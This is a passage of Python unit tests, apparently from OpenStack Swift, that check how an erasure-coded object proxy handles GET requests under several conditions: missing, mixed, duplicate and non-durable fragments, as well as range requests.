{'obj': obj1, 'frag': 2}, # missed
{'obj': obj2, 'frag': 3},
{'obj': obj2, 'frag': 4},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6}, # missed
{'obj': obj2, 'frag': 7},
{'obj': obj2, 'frag': 8},
{'obj': obj1, 'frag': 9}, # missed
{'obj': obj1, 'frag': 10}, # missed
{'obj': obj1, 'frag': 11}, # missed
{'obj': obj2, 'frag': 12},
{'obj': obj2, 'frag': 13},
{'obj': obj2, 'frag': 6}, # handoff
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# there's not enough of the obj2 etag on the primaries, we would
# have collected responses for both etags, and would have made
# one more request to the handoff node
self.assertEqual(len(log), self.replicas() + 1)
self.assertEqual(len(collected_responses), 2)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_succeed(self):
obj1 = self._make_ec_object_stub(pattern='obj1', timestamp=self.ts())
obj2 = self._make_ec_object_stub(pattern='obj2', timestamp=self.ts())
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
[],
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
[],
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
[],
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
[],
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
[],
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
[],
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
[],
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
[],
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
[],
{'obj': obj2, 'frag': 9},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# we go exactly as long as we have to, finding two different
# etags and some 404's (i.e. collected_responses[None])
self.assertEqual(len(log), len(node_frags))
self.assertEqual(len(collected_responses), 3)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_stop(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
[],
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
[],
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
[],
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
[],
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
[],
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
[],
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
[],
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
[],
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
[],
# handoffs are iter'd in order so proxy will see 404 from this
# final handoff
[],
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# default node_iter will exhaust at 2 * replicas
self.assertEqual(len(log), 2 * self.replicas())
self.assertEqual(len(collected_responses), 3)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_duplicate_and_hidden_frag_indexes(self):
obj1 = self._make_ec_object_stub()
# proxy should ignore duplicated frag indexes and continue search for
# a set of unique indexes, finding last one on a handoff
node_frags = [
[{'obj': obj1, 'frag': 0}, {'obj': obj1, 'frag': 5}],
{'obj': obj1, 'frag': 0}, # duplicate frag
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 1}, # duplicate frag
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 2}, # duplicate frag
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 3}, # duplicate frag
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 4}, # duplicate frag
{'obj': obj1, 'frag': 10},
{'obj': obj1, 'frag': 11},
{'obj': obj1, 'frag': 12},
{'obj': obj1, 'frag': 13},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
# Expect a maximum of one request to each primary plus one extra
# request to node 1. Actual value could be less if the extra request
# occurs and quorum is reached before requests to nodes with a
# duplicate frag.
self.assertLessEqual(len(log), self.replicas() + 1)
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), self.policy.ec_ndata)
def test_GET_with_missing_and_mixed_frags_may_503(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# we get a 503 when all the handoffs return 200
node_frags = [[]] * self.replicas() # primaries have no frags
node_frags = node_frags + [ # handoffs all have frags
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
# never get a quorum so all nodes are searched
self.assertEqual(len(log), 2 * self.replicas())
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), 7)
def test_GET_with_mixed_frags_and_no_quorum_will_503(self):
# all nodes have a frag but there is no one set that reaches quorum,
# which means there is no backend 404 response, but proxy should still
# return 404 rather than 503
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
obj3 = self._make_ec_object_stub(pattern='obj3')
obj4 = self._make_ec_object_stub(pattern='obj4')
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj3, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj3, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj3, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj3, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj3, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj3, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
{'obj': obj3, 'frag': 6},
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
{'obj': obj3, 'frag': 7},
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
{'obj': obj3, 'frag': 8},
{'obj': obj4, 'frag': 8},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
collected_etags = set()
collected_status = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag)
collected_status.add(conn.resp.status)
# default node_iter will exhaust at 2 * replicas
self.assertEqual(len(log), 2 * self.replicas())
self.assertEqual(
{obj1['etag'], obj2['etag'], obj3['etag'], obj4['etag']},
collected_etags)
self.assertEqual({200}, collected_status)
def test_GET_with_quorum_durable_files(self):
# verify that only (ec_nparity + 1) nodes need to be durable for a GET
# to be completed with ec_ndata requests.
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': True}, # durable
{'obj': obj1, 'frag': 1, 'durable': True}, # durable
{'obj': obj1, 'frag': 2, 'durable': True}, # durable
{'obj': obj1, 'frag': 3, 'durable': True}, # durable
{'obj': obj1, 'frag': 4, 'durable': True}, # durable
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
] # handoffs not used in this scenario
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
self.assertEqual(self.policy.ec_ndata, len(log))
collected_durables = []
for conn in log:
if (conn.resp.headers.get('X-Backend-Durable-Timestamp')
== conn.resp.headers.get('X-Backend-Data-Timestamp')):
collected_durables.append(conn)
# because nodes are shuffled we can't be sure how many durables are
# returned but it must be at least 1 and cannot exceed 5
self.assertLessEqual(len(collected_durables), 5)
self.assertGreaterEqual(len(collected_durables), 1)
def test_GET_with_single_durable_file(self):
# verify that a single durable is sufficient for a GET
# to be completed with ec_ndata requests.
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': True}, # durable
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
] # handoffs not used in this scenario
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
collected_durables = []
for conn in log:
if (conn.resp.headers.get('X-Backend-Durable-Timestamp')
== conn.resp.headers.get('X-Backend-Data-Timestamp')):
collected_durables.append(conn)
# because nodes are shuffled we can't be sure how many non-durables
# are returned before the durable, but we do expect a single durable
self.assertEqual(1, len(collected_durables))
def test_GET_with_no_durable_files(self):
# verify that at least one durable is necessary for a successful GET
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
] + [[]] * self.replicas() # handoffs
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# all 28 nodes tried with an optimistic get, none are durable and none
# report having a durable timestamp
self.assertEqual(28, len(log))
def test_GET_with_missing_durable_files_and_mixed_etags(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# non-quorate durables for another object won't stop us finding the
# quorate object
node_frags = [
# ec_ndata - 1 frags of obj2 are available and durable
{'obj': obj2, 'frag': 0, 'durable': True},
{'obj': obj2, 'frag': 1, 'durable': True},
{'obj': obj2, 'frag': 2, 'durable': True},
{'obj': obj2, 'frag': 3, 'durable': True},
{'obj': obj2, 'frag': 4, 'durable': True},
{'obj': obj2, 'frag': 5, 'durable': True},
{'obj': obj2, 'frag': 6, 'durable': True},
{'obj': obj2, 'frag': 7, 'durable': True},
{'obj': obj2, 'frag': 8, 'durable': True},
# ec_ndata frags of obj1 are available and one is durable
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': True},
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
# Quorum of non-durables for a different object won't
# prevent us hunting down the durable object
node_frags = [
# primaries
{'obj': obj2, 'frag': 0, 'durable': False},
{'obj': obj2, 'frag': 1, 'durable': False},
{'obj': obj2, 'frag': 2, 'durable': False},
{'obj': obj2, 'frag': 3, 'durable': False},
{'obj': obj2, 'frag': 4, 'durable': False},
{'obj': obj2, 'frag': 5, 'durable': False},
{'obj': obj2, 'frag': 6, 'durable': False},
{'obj': obj2, 'frag': 7, 'durable': False},
{'obj': obj2, 'frag': 8, 'durable': False},
{'obj': obj2, 'frag': 9, 'durable': False},
{'obj': obj2, 'frag': 10, 'durable': False},
{'obj': obj2, 'frag': 11, 'durable': False},
{'obj': obj2, 'frag': 12, 'durable': False},
{'obj': obj2, 'frag': 13, 'durable': False},
# handoffs
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': True}, # parity
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
def test_GET_with_missing_durables_and_older_durables(self):
# scenario: non-durable frags of newer obj1 obscure all durable frags
# of older obj2, so first 14 requests result in a non-durable set.
# At that point (or before) the proxy knows that a durable set of
# frags for obj2 exists so will fetch them, requiring another 10
# directed requests.
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self._ts_iter.next())
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self._ts_iter.next())
node_frags = [
[{'obj': obj1, 'frag': 0, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj2, 'frag': 1, 'durable': True}],
[{'obj': obj1, 'frag': 2, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj2, 'frag': 3, 'durable': True}],
[{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj2, 'frag': 4, 'durable': True}],
[{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj2, 'frag': 5, 'durable': True}],
[{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj2, 'frag': 6, 'durable': True}],
[{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj2, 'frag': 7, 'durable': True}],
[{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj2, 'frag': 8, 'durable': True}],
[{'obj': obj1, 'frag': 9, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 10, 'durable': False},
{'obj': obj2, 'frag': 10, 'durable': True}],
[{'obj': obj1, 'frag': 11, 'durable': False},
{'obj': obj2, 'frag': 11, 'durable': True}],
[{'obj': obj1, 'frag': 12, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 13, 'durable': False},
{'obj': obj2, 'frag': 13, 'durable': True}],
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
# max: proxy will GET all non-durable obj1 frags and then 10 obj frags
self.assertLessEqual(len(log), self.replicas() + self.policy.ec_ndata)
# min: proxy will GET 10 non-durable obj1 frags and then 10 obj frags
self.assertGreaterEqual(len(log), 2 * self.policy.ec_ndata)
# scenario: obj3 has 14 frags but only 2 are durable and these are
# obscured by two non-durable frags of obj1. There is also a single
# non-durable frag of obj2. The proxy will need to do at least 10
# GETs to see all the obj3 frags plus 1 more to GET a durable frag.
# The proxy may also do one more GET if the obj2 frag is found.
# i.e. 10 + 1 durable for obj3, 2 for obj1 and 1 more if obj2 found
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self._ts_iter.next())
obj3 = self._make_ec_object_stub(pattern='obj3',
timestamp=self._ts_iter.next())
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self._ts_iter.next())
node_frags = [
[{'obj': obj1, 'frag': 0, 'durable': False}, # obj1 frag
{'obj': obj3, 'frag': 0, 'durable': True}],
[{'obj': obj1, 'frag': 1, 'durable': False}, # obj1 frag
{'obj': obj3, 'frag': 1, 'durable': True}],
[{'obj': obj2, 'frag': 2, 'durable': False}, # obj2 frag
{'obj': obj3, 'frag': 2, 'durable': False}],
[{'obj': obj3, 'frag': 3, 'durable': False}],
[{'obj': obj3, 'frag': 4, 'durable': False}],
[{'obj': obj3, 'frag': 5, 'durable': False}],
[{'obj': obj3, 'frag': 6, 'durable': False}],
[{'obj': obj3, 'frag': 7, 'durable': False}],
[{'obj': obj3, 'frag': 8, 'durable': False}],
[{'obj': obj3, 'frag': 9, 'durable': False}],
[{'obj': obj3, 'frag': 10, 'durable': False}],
[{'obj': obj3, 'frag': 11, 'durable': False}],
[{'obj': obj3, 'frag': 12, 'durable': False}],
[{'obj': obj3, 'frag': 13, 'durable': False}],
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj3['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj3['etag'])
self.assertGreaterEqual(len(log), self.policy.ec_ndata + 1)
self.assertLessEqual(len(log), self.policy.ec_ndata + 4)
def test_GET_with_missing_durables_and_older_non_durables(self):
# scenario: non-durable frags of newer obj1 obscure all frags
# of older obj2, so first 28 requests result in a non-durable set.
# There are only 10 frags for obj2 and one is not durable.
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self._ts_iter.next())
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self._ts_iter.next())
node_frags = [
[{'obj': obj1, 'frag': 0, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj2, 'frag': 1, 'durable': False}], # obj2 non-durable
[{'obj': obj1, 'frag': 2, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj2, 'frag': 3, 'durable': True}],
[{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj2, 'frag': 4, 'durable': True}],
[{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj2, 'frag': 5, 'durable': True}],
[{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj2, 'frag': 6, 'durable': True}],
[{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj2, 'frag': 7, 'durable': True}],
[{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj2, 'frag': 8, 'durable': True}],
[{'obj': obj1, 'frag': 9, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 10, 'durable': False},
{'obj': obj2, 'frag': 10, 'durable': True}],
[{'obj': obj1, 'frag': 11, 'durable': False},
{'obj': obj2, 'frag': 11, 'durable': True}],
[{'obj': obj1, 'frag': 12, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 13, 'durable': False},
{'obj': obj2, 'frag': 13, 'durable': True}],
[], # 1 empty primary
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
# max: proxy will GET all non-durable obj1 frags and then 10 obj2 frags
self.assertLessEqual(len(log), self.replicas() + self.policy.ec_ndata)
# min: proxy will GET 10 non-durable obj1 frags and then 10 obj2 frags
self.assertGreaterEqual(len(log), 2 * self.policy.ec_ndata)
def test_GET_with_mixed_etags_at_same_timestamp(self):
# this scenario should never occur but if there are somehow
# fragments for different content at the same timestamp then the
# object controller should handle it gracefully
ts = self.ts() # force equal timestamps for two objects
obj1 = self._make_ec_object_stub(timestamp=ts, pattern='obj1')
obj2 = self._make_ec_object_stub(timestamp=ts, pattern='obj2')
self.assertNotEqual(obj1['etag'], obj2['etag']) # sanity
node_frags = [
# 7 frags of obj2 are available and durable
{'obj': obj2, 'frag': 0, 'durable': True},
{'obj': obj2, 'frag': 1, 'durable': True},
{'obj': obj2, 'frag': 2, 'durable': True},
{'obj': obj2, 'frag': 3, 'durable': True},
{'obj': obj2, 'frag': 4, 'durable': True},
{'obj': obj2, 'frag': 5, 'durable': True},
{'obj': obj2, 'frag': 6, 'durable': True},
# 7 frags of obj1 are available and durable
{'obj': obj1, 'frag': 7, 'durable': True},
{'obj': obj1, 'frag': 8, 'durable': True},
{'obj': obj1, 'frag': 9, 'durable': True},
{'obj': obj1, 'frag': 10, 'durable': True},
{'obj': obj1, 'frag': 11, 'durable': True},
{'obj': obj1, 'frag': 12, 'durable': True},
{'obj': obj1, 'frag': 13, 'durable': True},
] + [[]] * self.replicas() # handoffs
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
# read body to provoke any EC decode errors
self.assertFalse(resp.body)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), self.replicas() * 2)
collected_etags = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag) # will be None from handoffs
self.assertEqual({obj1['etag'], obj2['etag'], None}, collected_etags)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertEqual(log_lines,
['Problem with fragment response: ETag mismatch'] * 7)
def test_GET_mixed_success_with_range(self):
fragment_size = self.policy.fragment_size
ec_stub = self._make_ec_object_stub()
frag_archives = ec_stub['frags']
frag_archive_size = len(ec_stub['frags'][0])
headers = {
'Content-Type': 'text/plain',
'Content-Length': fragment_size,
'Content-Range': 'bytes 0-%s/%s' % (fragment_size - 1,
frag_archive_size),
'X-Object-Sysmeta-Ec-Content-Length': len(ec_stub['body']),
'X-Object-Sysmeta-Ec-Etag': ec_stub['etag'],
'X-Timestamp': Timestamp(self._ts_iter.next()).normal,
}
responses = [
StubResponse(206, frag_archives[0][:fragment_size], headers, 0),
StubResponse(206, frag_archives[1][:fragment_size], headers, 1),
StubResponse(206, frag_archives[2][:fragment_size], headers, 2),
StubResponse(206, frag_archives[3][:fragment_size], headers, 3),
StubResponse(206, frag_archives[4][:fragment_size], headers, 4),
# data nodes with old frag
StubResponse(416, frag_index=5),
StubResponse(416, frag_index=6),
StubResponse(206, frag_archives[7][:fragment_size], headers, 7),
StubResponse(206, frag_archives[8][:fragment_size], headers, 8),
StubResponse(206, frag_archives[9][:fragment_size], headers, 9),
# hopefully we ask for two more
StubResponse(206, frag_archives[10][:fragment_size], headers, 10),
StubResponse(206, frag_archives[11][:fragment_size], headers, 11),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o', headers={'Range': 'bytes=0-3'})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'test')
self.assertEqual(len(log), self.policy.ec_ndata + 2)
# verify that even when last responses to be collected are 416's
# the shortfall of 2xx responses still triggers extra spawned requests
responses = [
StubResponse(206, frag_archives[0][:fragment_size], headers, 0),
StubResponse(206, frag_archives[1][:fragment_size], headers, 1),
StubResponse(206, frag_archives[2][:fragment_size], headers, 2),
StubResponse(206, frag_archives[3][:fragment_size], headers, 3),
StubResponse(206, frag_archives[4][:fragment_size], headers, 4),
StubResponse(206, frag_archives[7][:fragment_size], headers, 7),
StubResponse(206, frag_archives[8][:fragment_size], headers, 8),
StubResponse(206, frag_archives[9][:fragment_size], headers, 9),
StubResponse(206, frag_archives[10][:fragment_size], headers, 10),
# data nodes with old frag
StubResponse(416, frag_index=5),
# hopefully we ask for one more
StubResponse(416, frag_index=6),
# and hopefully we ask for another
StubResponse(206, frag_archives[11][:fragment_size], headers, 11),
]
req = swob.Request.blank('/v1/a/c/o', headers={'Range': 'bytes=0-3'})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'test')
self.assertEqual(len(log), self.policy.ec_ndata + 2)
def test_GET_with_range_unsatisfiable_mixed_success(self):
responses = [
StubResponse(416, frag_index=0),
StubResponse(416, frag_index=1),
StubResponse(416, frag_index=2),
StubResponse(416, frag_index=3),
StubResponse(416, frag_index=4),
StubResponse(416, frag_index=5),
StubResponse(416, frag_index=6),
# sneak in bogus extra responses
StubResponse(404),
StubResponse(206, frag_index=8),
# and then just "enough" more 416's
StubResponse(416, frag_index=9),
StubResponse(416, frag_index=10),
StubResponse(416, frag_index=11),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o', headers={
'Range': 'bytes=%s-' % 100000000000000})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 416)
# ec_ndata responses that must agree, plus the bogus extras
self.assertEqual(len(log), self.policy.ec_ndata + 2)
def test_GET_with_missing_and_range_unsatisifiable(self):
responses = [ # not quite ec_ndata frags on primaries
StubResponse(416, frag_index=0),
StubResponse(416, frag_index=1),
StubResponse(416, frag_index=2),
StubResponse(416, frag_index=3),
StubResponse(416, frag_index=4),
StubResponse(416, frag_index=5),
StubResponse(416, frag_index=6),
